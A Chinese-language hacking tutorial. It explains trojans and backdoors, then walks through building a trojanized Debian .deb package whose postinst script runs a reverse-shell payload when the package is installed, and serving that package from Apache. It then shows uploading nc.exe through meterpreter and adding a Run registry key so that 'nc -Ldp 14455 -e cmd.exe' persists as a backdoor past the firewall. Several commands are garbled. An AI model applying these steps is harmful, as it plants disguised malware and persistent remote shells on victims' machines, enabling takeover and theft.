01木马与后门

木马？后门？

木马和后门都有害，尤其是木马，它由攻击者主动发起，稍不留心就会被利用；后门原来是留给自己方便用的，但也有可能被非法利用，这两种程序都会给用户带来损失。

木马是指潜伏在电脑中，可受外部用户控制以窃取本机信息或者控制权的程序。也称木马病毒，是指通过特定的程序来控制另一台计算机。与蠕虫病毒不同，它不会自我繁殖，也并不“刻意”地去感染其他文件，它通过将自身伪装吸引用户下载执行，向施种木马者提供打开被种主机的门户，使施种者可以任意毁坏、窃取被种者的文件，甚至远程操控被种主机。

后门程序一般是指那些绕过安全性控制而获取对程序或系统访问权的程序方法。在软件的开发阶段，程序员常常会在软件内创建后门程序以便可以修改程序设计中的缺陷。但是，如果这些后门被其他人知道，或是在发布软件之前没有删除后门程序，那么它就成了安全风险，容易被黑客当成漏洞进行攻击。

后门与木马的相同之处在于，后门程序不一定有自我复制的动作，也就是后门程序不一定会“感染”其它电脑。

02木马的制作与利用

Linux木马制作

将恶意代码捆绑在安装包中，使得用户下载后一经安装立即收到shell，从而控制整个目标机。

deb包

deb包是debian，ubuntu等LINUX发行版的软件安装包，在Linux操作系统中类似于windows中的软件包（exe），不需要太复杂的编译即可通过鼠标点击安装使用。处理这些包的经典程序是dpkg。

dpkg制作deb包 

deb包里的结构：DEBIAN目录和软件具体安装目录（模拟安装目录）（如etc，usr，opt，tmp等）。

在DEBIAN目录中至少有control文件，还可能有postinst（postinstallation）、postrm（postremove）、preinst（preinstallation）、prerm（preremove）、copyright（版权）、changlog（修订记录）和conffiles等。

control文件：

描述软件包的名称（Package），版本（Version），描述（Description）等，是deb包必须具备的描述性文件，以便于软件的安装管理和索引。为了能将软件包进行充分的管理，可能还具有其它字段。

postinst文件：

包含了软件在进行正常目录文件拷贝到系统后，所需要执行的配置工作。

Deb包解压

创建contral和postinst文件

postinst文件内容（软件安装完后，执行该Shell脚本，一般用来配置软件执行环境，必须以“#!/bin/sh”为首行，然后给该脚本赋予可执行权限：chmod +x  postinst）：

生成payload，我们将会创建一个反弹shell来反向连接到我们。

将其命名为“freesweep_scores"

chmod 755 postinst

dpkg-deb—build /tmp/work

mv work.deb freesweep.deb

cp freesweep.deb /var/www/html/

service apache2 start

攻击机监听反向连接端口

03后门的安装与防火墙绕过

拿到meterpreter后上传nc后门并加入启动项，nc连接后操作防火墙开启后门程序绑定的端口，不再受防火墙限制。

拿到meterpreter后从本地上传一个nc到windows机器

upload/usr/share/windows-binaries/nc.exe    c:llwindowsllsystem32

reg setval -k HKLMIsoftwarellmicrosoftllwindowsllcurrentversionllrun-V

nc  -d “C:\lwindows\lsystem32\nc.exe  -Ldp 14455  -e  cmd.exe"

重启靶机测试shutdown-r，检查端口，测试nc直连